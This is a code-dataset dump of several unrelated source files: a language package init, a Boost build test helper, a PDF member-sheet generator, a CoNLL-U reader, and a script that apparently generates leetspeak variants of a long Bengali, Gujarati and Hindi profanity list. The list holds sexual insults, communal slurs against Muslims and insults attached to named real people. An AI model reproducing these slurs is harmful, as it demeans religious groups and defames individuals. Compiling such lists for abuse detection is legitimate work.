orcinus-lang/orcinus-bootstrap
|
3a4766f05a21ca5d4cd6384d1857ec1ffaa09518
|
[
"MIT"
] | null | null | null |
orcinus/workspace/__init__.py
|
orcinus-lang/orcinus-bootstrap
|
3a4766f05a21ca5d4cd6384d1857ec1ffaa09518
|
[
"MIT"
] | null | null | null |
# Copyright (C) 2019 Vasiliy Sheredeko
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
from orcinus.workspace.workspace import Workspace
from orcinus.workspace.document import Document
from orcinus.workspace.package import Package
| 34.111111
| 63
| 0.814332
|
92408d38f525122ba9b2a170f7deb0a1f44ce952
| 4,232
|
py
|
Python
|
deps/boost/tools/build/test/TestToolset.py
|
alexhenrie/poedit
|
b9b31a111d9e8a84cf1e698aff2c922a79bdd859
|
[
"MIT"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
deps/boost/tools/build/test/TestToolset.py
|
alexhenrie/poedit
|
b9b31a111d9e8a84cf1e698aff2c922a79bdd859
|
[
"MIT"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
deps/boost/tools/build/test/TestToolset.py
|
alexhenrie/poedit
|
b9b31a111d9e8a84cf1e698aff2c922a79bdd859
|
[
"MIT"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
#!/usr/bin/python
#
# Copyright 2017 Steven Watanabe
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# validates a toolset using a mock of the compiler
import BoostBuild
import os
import re
import sys
renames = {"debug": "variant=debug", "release": "variant=release"}
def set_default_target_os(os):
global removed
global default_target_os
default_target_os = os
removed = set()
removed.add("target-os=" + default_target_os)
def adjust_property(property):
global renames
if property in renames:
return renames[property]
else:
return property
def adjust_properties(properties):
global removed
return [adjust_property(p) for p in properties if p not in removed]
def has_property(name, properties):
return name in [re.sub("=.*", "", p) for p in properties]
def get_property(name, properties):
for m in [re.match("(.*)=(.*)", p) for p in properties]:
if m and m.group(1) == name:
return m.group(2)
def get_target_os(properties):
return get_property("target-os", properties) or default_target_os
def expand_properties(properties):
result = properties[:]
if not has_property("variant", properties):
result += ["variant=debug"]
if not has_property("threading", properties):
result += ["threading=single"]
if not has_property("exception-handling", properties):
result += ["exception-handling=on"]
if not has_property("link", properties):
result += ["link=shared"]
if not has_property("rtti", properties):
result += ["rtti=on"]
if not has_property("runtime-link", properties):
result += ["runtime-link=shared"]
if not has_property("strip", properties):
result += ["strip=off"]
if not has_property("target-os", properties):
result += ["target-os=" + default_target_os]
return result
def compute_path(properties, target_type):
path = ""
if "variant=release" in properties:
path += "/release"
else:
path += "/debug"
if has_property("address-model", properties):
path += "/address-model-" + get_property("address-model", properties)
if has_property("architecture", properties):
path += "/architecture-" + get_property("architecture", properties)
if "cxxstd=latest" in properties:
path += "/cxxstd-latest-iso"
if "exception-handling=off" in properties:
path += "/exception-handling-off"
if "link=static" in properties:
path += "/link-static"
if "rtti=off" in properties:
path += "/rtti-off"
if "runtime-link=static" in properties and target_type in ["exe"]:
path += "/runtime-link-static"
if "strip=on" in properties and target_type in ["dll", "exe", "obj2"]:
path += "/strip-on"
if get_target_os(properties) != default_target_os:
path += "/target-os-" + get_target_os(properties)
if "threading=multi" in properties:
path += "/threading-multi"
return path
def test_toolset(toolset, version, property_sets):
t = BoostBuild.Tester()
t.set_tree("toolset-mock")
# Build necessary tools
t.run_build_system(["-sPYTHON_CMD=%s" % sys.executable], subdir="src")
set_default_target_os(t.read("src/bin/target-os.txt").strip())
for properties in property_sets:
t.set_toolset(toolset + "-" + version, get_target_os(properties))
properties = adjust_properties(properties)
def path(t):
return toolset.split("-")[0] + "-*" + version + compute_path(properties, t)
os.environ["B2_PROPERTIES"] = " ".join(expand_properties(properties))
t.run_build_system(["--user-config="] + properties)
t.expect_addition("bin/%s/lib.obj" % (path("obj")))
if "link=static" not in properties:
t.expect_addition("bin/%s/l1.dll" % (path("dll")))
else:
t.expect_addition("bin/%s/l1.lib" % (path("lib")))
t.expect_addition("bin/%s/main.obj" % (path("obj2")))
t.expect_addition("bin/%s/test.exe" % (path("exe")))
t.expect_nothing_more()
t.rm("bin")
t.cleanup()
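# --- Hedged illustration (editor's addition, not part of the original test helper). ---
# Once a default target OS has been chosen, expand_properties() and compute_path() are
# plain functions that can be sanity-checked without invoking b2; importing this module
# still requires the BoostBuild test framework on the path.
def _example_property_paths():  # pragma: no cover
    set_default_target_os("linux")
    # Only non-default features contribute a path segment:
    assert compute_path(["variant=release", "link=static"], "exe") == "/release/link-static"
    # Missing features are filled in with their defaults:
    assert "threading=single" in expand_properties(["variant=debug"])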
| 34.688525
| 87
| 0.643195
|
efb77a7eafa9170dbb9fbb67e090ca9c7a81dd5a
| 4,246
|
py
|
Python
|
pycroft/helpers/printing/__init__.py
|
marcelb98/pycroft
|
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
|
[
"Apache-2.0"
] | null | null | null |
pycroft/helpers/printing/__init__.py
|
marcelb98/pycroft
|
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
|
[
"Apache-2.0"
] | null | null | null |
pycroft/helpers/printing/__init__.py
|
marcelb98/pycroft
|
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 The Pycroft Authors. See the AUTHORS file.
# This file is part of the Pycroft project and licensed under the terms of
# the Apache License, Version 2.0. See the LICENSE file for details.
from io import BytesIO
from os.path import dirname, join
from reportlab.lib.colors import black
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import StyleSheet1, ParagraphStyle
from reportlab.lib.units import cm
from reportlab.platypus import SimpleDocTemplate, Paragraph, Image, Table
from reportlab.platypus.flowables import HRFlowable
ASSETS_DIRECTORY = join(dirname(__file__), 'assets')
ASSETS_LOGO_FILENAME = join(ASSETS_DIRECTORY, 'logo.png')
def generate_user_sheet(user, user_id, plain_password):
"""Create a „new member“ datasheet for the given user
:param User user: A pycroft user
    :param str user_id: The user's ID. It has to be given separately,
        because the user_id is not apparent from the ORM object
        itself; encoding is done in the library.
:param str plain_password: The password
"""
    # Create the PDF document (page size: DIN A4, portrait)
buf = BytesIO()
pdf = SimpleDocTemplate(buf, pagesize=A4,
rightMargin=2 * cm,
leftMargin=2 * cm,
topMargin=2 * cm,
bottomMargin=2 * cm)
style = getStyleSheet()
story = []
im = Image(ASSETS_LOGO_FILENAME, 5 * cm, 5 * cm)
story.append(im)
story.append(HRFlowable(width="100%",
thickness=3,
color=black,
spaceBefore=0.8 * cm,
spaceAfter=0.8 * cm))
story.append(
Paragraph('Welcome as a member of the AG DSN, {}!'
.format(user.name),
style['BodyText']))
story.append(
Paragraph('We are proud to announce that your network access has been '
'activated. If you encounter any problems, drop us a mail or '
'visit us during our office hours. You can find contact '
'information at the bottom of this page.',
style['BodyText']))
story.append(
Paragraph('Please make sure to pay your membership contribution in time.'
' You can find further details on our web page.',
style['Bold']))
story.append(Paragraph('Wishing you all the best,', style['BodyText']))
story.append(Paragraph('Your AG DSN', style['BodyText']))
story.append(HRFlowable(width="100%",
thickness=3,
color=black,
spaceBefore=0.8 * cm,
spaceAfter=0.8 * cm))
ips = []
macs = []
for user_host in user.hosts:
for ip in user_host.ips:
ips.append(str(ip.address))
macs.append(ip.interface.mac)
data = [['Name:', user.name, 'User-ID:', user_id],
['Username:', user.login, 'IPv4-Address:', ', '.join(ips)],
['Password:', plain_password, 'MAC-Address:', ', '.join(macs)],
['E-Mail:', user.email, 'Location:', str(user.room)]]
t = Table(data, colWidths=[pdf.width * 0.15, pdf.width * 0.34] * 2)
story.append(t)
story.append(HRFlowable(width="100%", thickness=3, color=black, spaceBefore=0.8 * cm,
spaceAfter=0.8 * cm))
    # Generate and save the PDF
pdf.build(story)
return buf.getvalue()
def getStyleSheet():
"""Returns a stylesheet object"""
stylesheet = StyleSheet1()
stylesheet.add(ParagraphStyle(name='Normal',
fontName="Helvetica",
fontSize=10,
leading=12))
stylesheet.add(ParagraphStyle(name='BodyText',
parent=stylesheet['Normal'],
spaceBefore=14))
stylesheet.add(ParagraphStyle(name='Bold',
parent=stylesheet['BodyText'],
fontName="Helvetica-Bold"))
return stylesheet
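# Usage sketch (illustrative only, not part of the original module): `user`
# stands for a pycroft ORM User object with .name, .login, .email, .room and
# .hosts attributes; the user_id and password values below are made up.
#
#     pdf_bytes = generate_user_sheet(user, user_id='1337-0', plain_password='secret')
#     with open('user_sheet.pdf', 'wb') as f:
#         f.write(pdf_bytes)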
| 37.575221
| 89
| 0.567358
|
0fcc2697886a24660e92a7e6887ef1e536696469
| 3,941
|
py
|
Python
|
pytreex/block/read/conllu.py
|
leotilli/pytreex
|
a40bfb9f33ffdb931993b30879830f1c898f1414
|
[
"Apache-2.0"
] | null | null | null |
pytreex/block/read/conllu.py
|
leotilli/pytreex
|
a40bfb9f33ffdb931993b30879830f1c898f1414
|
[
"Apache-2.0"
] | null | null | null |
pytreex/block/read/conllu.py
|
leotilli/pytreex
|
a40bfb9f33ffdb931993b30879830f1c898f1414
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
#
# Block for reading CoNLL-U files
#
from __future__ import absolute_import
from __future__ import unicode_literals
from pytreex.core.block import Block
from pytreex.core import Document
from pytreex.core.exception import LoadingException
from pytreex.core.util import file_stream
import re
from pytreex.core.log import log_info
__author__ = "Martin Popel"
__date__ = "2015"
class ReadCoNLLU(Block):
"""\
Reader for CoNLL-U format used in Universal Dependencies
https://universaldependencies.github.io/docs/format.html
"""
def __init__(self, scenario, args):
"""\
Constructor, checks if language is set and selects encoding according
        to args, defaults to UTF-8.
"""
Block.__init__(self, scenario, args)
if self.language is None:
self.language = 'unk'
self.encoding = args.get('encoding', 'UTF-8')
def process_document(self, filename):
"""\
Read a CoNLL-U file and return its contents as a Document object.
"""
fh = file_stream(filename, encoding=self.encoding)
doc = Document(filename)
bundle = doc.create_bundle()
zone = bundle.create_zone(self.language, self.selector)
root = zone.create_atree()
last_node = root
nodes = [root]
parents = [0]
comment = ''
for line in fh:
# Strip newline character (\n or \r\n)
line = line.rstrip('\r\n')
            # An empty line marks the end of a sentence
if not line:
# Ignore (multiple) empty lines before start of sentence (invalid CoNLL-U)
if len(nodes)==1:
continue
                # Rehang nodes to their correct parents and store a nonempty comment on the zone
for i in xrange(1,len(nodes)):
nodes[i].parent = nodes[parents[i]]
if len(comment):
zone.wild['comment'] = comment
# Prepare a new bundle
bundle = doc.create_bundle()
zone = bundle.create_zone(self.language, self.selector)
root = zone.create_atree()
last_node = root
nodes = [root]
parents = [0]
comment = ''
# Comment
elif line[0] == '#':
comment += line[1:] + "\n"
# A normal line with one token
else:
columns = line.split('\t')
# TODO: multi-word tokens
if '-' in columns[0]:
continue
# Create new node
new_node = root.create_child(data = dict(
(key, value) for key, value in
zip(['form', 'lemma', 'upos', 'xpos', 'feats', 'deprel', 'deps', 'misc'],
columns[1:6] + columns[7:10] )
if value is not None and value != '_'
) )
nodes.append(new_node)
try:
parent_index = int(columns[6])
except (ValueError, TypeError):
# TODO: warning?
parent_index = 0
parents.append(parent_index)
# Word order TODO is this needed?
new_node.shift_after_subtree(last_node)
last_node = new_node
# The last bundle should be empty (if the file ended with an empty line),
# so we need to remove it. But let's check it.
if len(nodes)==1:
doc.bundles.pop()
else:
for i in xrange(1,len(nodes)):
nodes[i].parent = nodes[parents[i]]
if len(comment):
zone.wild['comment'] = comment
fh.close()
return doc
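# Minimal usage sketch (hypothetical -- pytreex normally builds blocks from a
# Scenario object; whether passing `scenario=None` works depends on
# Block.__init__, so treat this purely as an illustration):
#
#     reader = ReadCoNLLU(scenario=None, args={'language': 'en', 'encoding': 'UTF-8'})
#     doc = reader.process_document('input.conllu')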
| 32.841667
| 96
| 0.513575
|
7627e028ba2ba86e785e340f232f05c119e756c7
| 54,687
|
py
|
Python
|
synthetic data generation/DataGen.py
|
vivolscute/INDIAN_Bad_Words_Dataset
|
8f4ec1fdf9838994fe8e2cee995f5873ce4da572
|
[
"MIT"
] | 1
|
2021-06-15T19:01:19.000Z
|
2021-06-15T19:01:19.000Z
|
synthetic data generation/DataGen.py
|
vivolscute/INDIAN_Bad_Words_Dataset
|
8f4ec1fdf9838994fe8e2cee995f5873ce4da572
|
[
"MIT"
] | null | null | null |
synthetic data generation/DataGen.py
|
vivolscute/INDIAN_Bad_Words_Dataset
|
8f4ec1fdf9838994fe8e2cee995f5873ce4da572
|
[
"MIT"
] | null | null | null |
from itertools import product
from IPython.display import clear_output
import pandas as pd  # needed for the DataFrame/CSV export at the end of this script
REPLACE = {'a': '@', 'i': '*', 'o': '*', 'u': '*', 'v': '*',
'l': '1', 'e': '*', 's': '$', 't': '7'}
def Leet2Combos(word):
possibles = []
for l in word.lower():
ll = REPLACE.get(l, l)
possibles.append( (l,) if ll == l else (l, ll) )
return [ ''.join(t) for t in product(*possibles) ]
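# Illustrative example (not part of the original script): with the REPLACE map
# above, Leet2Combos("lol") yields every combination of each letter with its
# leet substitute:
#     ['lol', 'lo1', 'l*l', 'l*1', '1ol', '1o1', '1*l', '1*1']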
s = \
"""Chodon Boiraagi
Chodon Idli
chood
chudir bhai
Chudir Bhai
Chudir Pola
dan-da
dhon
dofla hetta
fatly
Fel
foga
foon, foondh
fungi
Futki
fuun-ga
gorur bachcha
gud
gud maranir beta
gud/guud
Guundaa
Haram jada
haram jadi
Hauwa
hetta muka ath bori dimo
hetta, bodha, shauwaa
Kalu
Calou
Kalou
Blackie
Keltu
Kelo
Kolo Toure
Djimi Traore
Kalo Hulo
Nigga
khanki
khanki chudi magir gude poka
khanki
maggi
khankir chele
Khankir Pola
khobis or goror khobis
Kuth-tar Bachcha
Kuthar Bacha
Kuththar
Baiccha Baich-cha
Kuttar Bhaccha
kuttar chod
Kuttar gu
laora
lerr
lerr kawrar fua
Maagi
Maal
maggir putt
Moga choder bacha
mother chod
Muta kuta
nankta kuttar baccha
Nunu
nunu
pagol sagol
Pagul
pasa
podmarani
Sagul
Shauwa
shuorer baccha
Shurur Batcha
Suda-sudi
SUDAURIER FURII
SUDAURY
Suourer bachcha
SUTHH-MAROUNY
thor hetta laythum
thor maa suda
thor maar bothoy kha
thore astha gao eh sudeh
thumar futki marthum
nunu
Thuuii Bandhorr
Thuuii Gaadhaa
to-mar ma hetta
Tor baaf fel Khai
Tor Bafor Boga Saat
tor ma amar fell
tor ma boga cha
Tor Maa
tor maa booni nay
tor maa ke chudi
Tor mayere chudi
Tor nanire chudi
tor nunu bouut boro
Tor pasha mota
tu ekta bandar
Tur booga sooto
tur mar booni khaa
tuy ath marros
Vogchod
Bain Chod
Bainchod
Bassa Shouko
chodnar po
Gud-marani
hagoo
Hijra
Hoga
Khankir pola
Kuthaar Baicha
Kuttar Bachcha
kuttar bachcha
Leura
Magi
Mai
makhal
muri kha
Noakhailla
randi magi
khai lai moo
bosoi khai see
Tomar maar putkey fatamu .
Tor babar bichi fatabo
Tor mar sawa kha
tor mare chudi
tur ma amar fel be
Aanguli kora
achuda
ads
Ami tor maa ke chudmu
baal
Baal chhero
Bara
Beissha Magir Pola
Bhag
Bhoda
Bokachoda
boltu chire felbo
botoi khowra
Choda
Chood
Chudanir pola
Chudi
Chudmu tor pasai sneha
Chumban
Chumu
Dhon
Dhon khecha
Gaand Maarano
Gud
Humaira
Khanki
khanki Magi
khankir pola
kuttar Baccha
lehr kawrar bachha
Mang
Naang
pod marani
Pond
Shetar bal
Shishna
Sohail
Thor heta muka ath boridimu
Tor Gaar Maari
Tor maa ke chudi
tor mar vhoda
tumi bal hagu koro!!
Vuuski magi
Aar
bahanchod
baila
baklol
bapjeth
bawaseer ho kya
bhadwa
bhethi
bhosda
bhosri wali
boor
Boor ka baal
burbak
chhinar
chhota chetan
chuchi
chutmuha
dogla
gaar marao
gaar maraye duniya
gaar me daal le
gadchat
jhatwa
kiski maiyaa kutta biyayi
laar
laar chato
laar lega
larchat
maa chudao
muth
randi ka bachha
randikhana
ravi kumar patel
tori bahin ke chodu
tori maiyaa ke chodu
maari tatoori ne chalay
Akbaruddin Owaisi
Alloo Bhosri Chaat
Anuj
Babhuchak
bai no bhosdo
bein chod
Benchod
Bhadvo
bhenchod
Bhoot
Bhopa
Bhos marina
Bhosad Pappu
bhosdo
bhosrini
bobla
Bobla Vagarni Baydi
Bosrichord
bosrina
Buckwass
Budhalal
chafu gaan
Chichi
Chod
Chod ami
Chodhru
chodkanya
Chodu
chupri lauri
Chutiya
Darshil
Dheela Lund Ni Olaad
Eapen
Fattu
gaan tari
Gaand Ghapli
Gaand Ma Ghal
gaandina, gandina
Gand nu kaanu
gandi chodina
gando
Gando salo
gel ghagharina
Ghel Chodyo
Ghelchoydi
Halki Raand na
Harsh Dalal
harshit
hopa
Huzefa
jaaro
Jhadhino!
karo loro
kem chho
kutari
Lakhota
Land
loda
lodde mari
Lowroh
luli
Lund Bhagat
Maa ne ghat bhosdina
maajaddha
maari tatoori ooper bess
maasi chodamno
Madachod
madachod
mandi susee
Manik
mara man no lado
mari bhosri chaat
meri gaan chatt
Mohit
Moht
mota jijah
nago choido
Nakhodiya
pikina
Pikina
pim pim
poom poom
Priyanshu
puchi chod
Puti
raand
rumana
sali
salu gut`ti
Sandas
suwwar jewu dachu
taari bai no aghano
Tara baap ni gaan
Taree gaar ma lowroh
bhosri
tari bosri
tari dagri
tari gaand
bulbla
tari ma ne
tari ma ni putti
tari maani putli
tari ma no poplo
Tari maa na babla
Tari maa na bhosda
maro lodo
Tari maa ne chodu
Tari maa ni taturi
tari mai ni gand
tere ma nu hinta kar
teree maa gaderi
Thari Ma Ni Ghaan
Tusat
nirodh
bahan ke lawde
Bawali gand
Bhen ke dine
chudhu ke chodde
Dhi ke lawde
Dhichod
bhoor
chuttar
chuttari
gand chod
Ghunt Fala
Jhulaniya
Madhar chod
shivom lal
teri maichod
katela lund
bhadvi
rand
madharchod
chut
chut ke baal
chut ke dhakkan
chut maarli
chutad
chutadd
chutan
chutia
chutiya
gaand
gaandfat
gaandmasti
gaandufad
gandu
gashti
gasti
ghassa
ghasti
harami
haramzade
hawas
hawas ke pujari
hijda
hijra
jhant
jhant chaatu
jhant ke baal
jhantu
kamine
kaminey
kanjar
kutta
kutta kamina
kutte ki aulad
kutte ki jat
kuttiya
loda
lodu
lund
lund choos
lund khajoor
lundtopi
lundure
maa ki chut
maal
madar chod
mooh mein le
mutth
najayaz
najayaz aulaad
najayaz paidaish
paki
pataka
patakha
raand
randi
saala
saala kutta
saali kutti
saali randi
suar
suar ki aulad
tatte
tatti
bhosada
boba
chusu
chut
tharak
tharki
bsdk
mc
bsdk
hutiye
chakka
randwe
randve
chutiye
madarjaat
lomda
chumtiya
chumtiye
chus
tatto
goti
gotiya
gand
chuut
chodya
ke chode
chode
chodyu
boba
kutta
fakir
Jaan var
Kutta
Kuttiya
Khota
Khotey ki aulad
Kutte ki jat
Najayaz
Najayaz paidaish
Saala kutta
Saali kutti
Soover
Tatti
Bahen Chod
Bahen ke laude
Bahen ke takke
Beti Chod
Bhai Chod
Bhains ki aulad
Jhalla, Faggot
Jhant ke baal
Jhaant ke pissu
Kutte ka aulad
Kutte ke tatte
Maadher chod
Padma
Raand ka jamai
Randhwa
randwa
Rundi
Rundi ka bacha
Rundi Ki bachi
Soower ke bachche
Ullu ke pathe
Bandaa
Booblay
BhonsRi-Waalaa
Carrom board
Chhed
Chut
Chut marike
Chodu
Chodra
Choochii
Gaandu
Gaand
Ing ge pan di kut teh
LavDa
Lavde
Lund
Lavde ke bal
Lavander
Mangachinamun
Muth mar
Nimbu sharbat
Maa ke bable
Mammey mumm-aye
Tatte Masalna
Toto
Toota hua lund
Backar chodu
Bhand khau
Bhandwe ki aulad
Bhosad Chod
Bumchod
Bur ki chatani
Cuntmama
chut ke pasine
gaand ke pasine
jhaat ke baal
Chippkali ke
jhaant
Chodela
Chodu bhagat
Chhola Phudakna
Chudan chudai
Chudai khana
Chunni
Choot ka baal
Choot ke bhoot
Chut ke dhakkan
Chut mari ke
Choot marani ka
Chut ke pasine
Chup Ke Chut Hai
Gaandu
Gaandfat
Gaandmasti
Gaand ka makhan
Gaand marau
Ghondoo
Jhant chaatu
Jhaat ka bhaaji
Kutte ka beej
Lund choosu
Lund fakeer
Lundoos
Lund ka shorba
Land ka bheja
Lund pe chad ja
Lund pe thand hai
Lund Ke Pasine
Lavde ke baal
Maa ke bhadwe
Muth maar
Parichod
Pucchi
Raandi baajer
Rundi ko choud
Rubber bhosda
Sadi hui gand
Apna land choos
Chinaal
muth
Gand Ka Khatmal
Gandkate Kutte
Gaand mein bambu
Gaand main lassan
Gaand main danda
Gaand main keera
Jaa Apni Bajaa
chuttiya
Choot
Jhaat
teri maa ki choot
Lund Chus
Ma chudi
liya tha
chunni choos
lund choos
Chuus Maro
Raand
Rundi
chod
lauda
Chodhunga
Ka Lund
Teri Jhanten
gandi
gadha ka lund
Teri maa ka bhosda
chute
Tere mai ki chut
chodun.
chut
chode
Tor mai ke chodho
jaanvar
kutta
kutiya
khota
auladheen
jaat
najayaz
gandpaidaish
saala
kutti
soover
tatti
potty
behnchodon
behnchod
behenchod
behenchodd
bahenchod
bahanchod
bahencho
bancho
sali
bahenke
laude
takke
betichod
bhaichod
bhains
jhalla
jhant
nabaal
pissu
kutte
maderjat
madherchod
maderchod
madaarchod
madarjaat
maachod
madharchod
maderchodo
machod
maadherchod
madarchodon
madarchodd
madarchod
maadarchod
padma
raand
jamai
randwa
randi
bachachod
bachichod
soower
bachchechod
ullu
pathe
banda
booblay
booby
suar
buble
rand
babla
bhonsriwala
bhonsdiwala
ched
chut
chod
chodu
chodra
choochi
chuchi
gaandu
gandu
gaand
lavda
lawda
lauda
lund
balchod
lavander
muth
maacho
mammey
tatte
toto
toota
backar
bhandwe
bhosadchod
bhosad
bumchod
bum
bur
chatani
cunt
cuntmama
chipkali
sale
pasine
jhaat
chodela
bhagatchod
chhola
chudai
chudaikhana
chunni
choot
bhoot
dhakkan
bhajiye
fateychu
gandnatije
lundtopi
gaandu
gaandfat
gaandmasti
makhanchudai
gaandmarau
gandu
gand
chaatu
beej
choosu
fakeerchod
lundoos
shorba
binbheja
bhadwe
parichod
nirodh
pucchi
baajer
choud
bhosda
sadi
choos
maka
chinaal
gadde
joon
chullugand
doob
khatmal
gandkate
bambu
lassan
danda
keera
keeda
hazaarchu
paidaishikeeda
kali
safaid
poot
behendi
chus
machudi
chodoonga
baapchu
laltern
suhaagchudai
raatchuda
kaalu
neech
chikna
meetha
beechka
jihaadi
chooche
patichod
rundi
makkhi
biwichod
chodhunga
haathi
kute
jhanten
kaat
gandi
gadha
bimaar
badboodar
dum
raandsaala
phudi
chute
kussi
khandanchod
ghussa
maarey
chipkili
unday
budh
chaarpai
chodun
chatri
chode
chodho
mulle
mulli
musalman
momedan
katua
chutiyapa
bc
mc
chudwaya
kutton
lodi
loda
jungli
vahiyaat
jihadi
atankvadi
atankwadi
aatanki
aatankwadi
Beti Chod
Bhai Chod
Bhains ki aulad
Jhalla, Faggot
Jhant ke baal
Jhaant ke pissu
Kutte ka aulad
Kutte ke tatte
Maadher chod
Padma
Raand ka jamai
Randhwa
randwa
Rundi
Rundi ka bacha
Rundi Ki bachi
Soower ke bachche
Ullu ke pathe
Hindi Dirty Words
Bandaa
Booblay
BhonsRi-Waalaa
Carrom board
Chhed
Chut
Chut marike
Chodu
Chodra
Choochii
Gaandu
Gaand
Ing ge pan di kut teh
LavDa
Lavde
Lund
Lavde ke bal
Lavander
Mangachinamun
Muth mar
Nimbu sharbat
Maa ke bable
Mammey mumm-aye
Tatte Masalna
Toto
Toota hua lund
Hindi Profane Words
Backar chodu
Bhand khau
Bhandwe ki aulad
Bhosad Chod
Bumchod
Bur ki chatani
Cuntmama
Chodela
Chodu bhagat
Chhola Phudakna
Chudan chudai
Chudai khana
Chunni
Choot ka baal
Choot ke bhoot
Chut ke dhakkan
Chut mari ke
Choot marani ka
Chup Ke Chut Hai
Gaandu
Gaandfat
Gaandmasti
Gaand ka makhan
Gaand marau
Ghondoo
Jhant chaatu
Jhaat ka bhaaji
Kutte ka beej
Lund choosu
Lund fakeer
Lundoos
Lund ka shorba
Land ka bheja
Lund pe chad ja
Lund pe thand hai
Lund Ke Pasine
Lavde ke baal
Maa ke bhadwe
Muth maar
Parichod
Pucchi
Raandi baajer
Rundi ko choud
Rubber bhosda
Sadi hui gand
Apna land choos
Apni ma ko ja choos
Gand Ka Khatmal
Gandkate Kutte
Gaand mein bambu
Gaand main lassan
Gaand main danda
Gaand main keera
Hazaar lund teri gaand main
Jaa Apni Bajaa
Lund Chus
Ma chudi
Mera chunni choos
Meri lund choos
Mere Chuus Maro
choot
chooche
bhosda
chute
chode
chodho
aand
aandal
aandu
aandupana
apni lund choos
apni ma ko ja choos
backarchodu
badboodar choot
badir
badirchand
bahen chod
bahen ka loda
bahen ke laude
bahen ke takke
bahen ki choot
bahenchod
bahinchod
bahnchod
bakland
bakri chod
bakwaas
ban chod
banchod
banchood
bandaa
bandhar
ben chod
benchod
beti chod
bhadhava
bhadkhau
bhadwa
bhadwe ka awlat
bhai chod
bhains ki aulad
bhan chhod
bhanchod
bhandava
bhen chod
bhen ke laude
bhen ke takke
bhenchod
bhenchodd
bhonsri-waalaa
bhosad chod
bhosadike
bhosdaa very
bhosdi ka
bhosdi wala
bhosdika
bol teri gand kaise maru
booblay
buddha khoosat
buhtah-nee ka
bumchod
bund
bund maraa le
bur
bur ki chatani
carrom board
char soh bis
chhaati
chhed
chhola phudakna
chinaal
chinaal ke gadde ke nipple ke baal ke joon
chipkali ke chut ke pasine
chipkali ke gaand ke pasine
chipkali ke jhaat ke baal
chipkali ke jhaat ke paseene
chipkali ki bhigi chut
chodela
chodnaa to fuck
chodra
chodu
chodu bhagat
choochi
choochii
choot
choot ka baal
chootad
chootadchod
chootia
chootiya
chootiyapa
chootiyapanti
chudaai
chudaai khaani
chudai
chudai khana
chudan
chudi
chudwana
chull uthna
chunni
chusnawal
chusnawala
chut
chut ka bhoot
chut ka pujari
chut ke dhakkan
chut ke gulam
chut ke pasine
chut marike
chutan
chutia
chutiya
chutiyapa
cuntmama
dhee chod
dhee ka lund
dheela lund
fate condom ka natije
fuddi pussy
gaand
gaand asshole (definition)
gaand ka makhan
gaand maarna to fuck in the ass
gaand main danda
gaand main keera
gaand main lassan
gaand marau
gaand marna
gaand mein bambu
gaandfat
gaandkate kutte
gaandmasti
gaandu
gaandu asshole (person)
gashti
gastee
gasti
ghassad
ghasti
ghelchodia
goti
gotiyan
gpl (gaand pe laat)
gundmaraa ass fucked (man)
gundmari ass fucked (lady)
haraam ka chuda son of unknown father
haraam ki chudi fucked by someone other then husband.
haraam zaada
haraami
haraamjaada son of unknown father
haraamjaadi daughter
haraamkhor
hijda
hijdaa
hijde
hijra
hug
ing ge pan di kut teh
januwar
jhaant
jhaant ka baal
jhaant ke pissu
jhaant ukhaadna
jhaat chaatu
jhaat ka bhaaji
jhalla
jhant ke baal
jhat ke baal
kaamchor
kadak maal
kali choot ke safaid jhaat
kali chut ka safaid jhaat
kamina
katla
khade lund pe dhoka
khasmanu khaani
khota
khotey ki aulad
khotey ki aulda
klpd
kutchudi
kuthi for girl
kutiya
kutiya ke pilley
kutte ka aulad
kutte ka awlat
kutte ka beej
kutte ka lund
kutte ke pilley
kutte ke poot
kutte ke tatte
kutte ki jat
kuttiya
kya kadak hai ye
kya maal hai ye
ladkichod
landait
lavander
lavda
lavde
lavde ke baal
lavde ke bal
loda
lodu
londiyachod
lund
lund choos
lund choosu
lund chus
lund fakeer
lund fakir
lund ka bheja
lund ka shorba
lund ke pasine
lund pe chad ja
lund pe thand hai
lund
lundoos
lundtopi
ma chudi
maa chudaa
maa ka bhosda
maa ke bable
maa ke bhadve
maa ke bhadwe
maa ke laude
maa ki choot
maa ki chut
maa ki phudi
maachod
maa-chod
maa-chut
maadarchod
maadher chod
maakichut
maal semen
mader chod
maha gaandu
mammey
mangachinamun
mast maal
momme
moot
mutar
muth maar
muth mar
muth marna
mutthal
na chhot
najayaz
najayaz paidaish
netrachodan mat kar
nimbu sharbat
paad
paadu kaun
paagal choda
padma
pancho
parichod
phatele nirodh ke natije
pisaab
pucchi
raand
raand ka jamai
raand ka pati
raandi baajer
raapchik
rakhail
rand chod
randhwa
randwa
rubber bhosda
rundee
rundi
rundi apni chut leka ana
rundi ka bacha
rundi khana
rundi ki bachi
rundi ko chowd
saala
saala kutta
saali kutti
sadi hui gaand
sali kuta
sali kutti
seal bund
seal pack virgin
sewwer ki bachi
soover
soower ke bachche
suwwar
suwwar ka bachcha
suwwar ke lund
suwwar ki bachchi
suwwariya
tatte masalna
toota hua lund
tor mai ke chodho
ulloo choda stupid
ulloo ka patthaa
ullu ke pathe
undi
randi
raandi
randwe
harami
haram khor
haramkor
maa chod
maa chuda
maa chooda
maa ki aankh
randi ke
bc
bkl
muh me lele
maa ka bhosdaa
gandwe
gandwa
bhosdi wale
c***yapa
bosdi ke
bosdike
madarchood
big boobs
shake your boobs
sex boob
suck ur boobs
maderchod
xxx
are u slut
fuckyoself
laude
bhosda
chutiyapanti
bhnchooo
fuk u
chut loda
lun pakad lo
madarchod
ma ke lode
chooth
teri ma ka bamba
suck bitch
screw u
screw you
puccy
laudagiri
bhenchodh
madarchodh
choothiye
maa chudao
gaand mara
xdesi.com
xvideos.com
b***s
chutiyaapaa
bhenchodo
maaki chut
f@#* you
f... u
nice boobs
tere maa chodunga
amma chod
chinal log
chinal
fudu
fuddu
buckchod
lauda
maa chudaye
chudaye
randi k
gandu
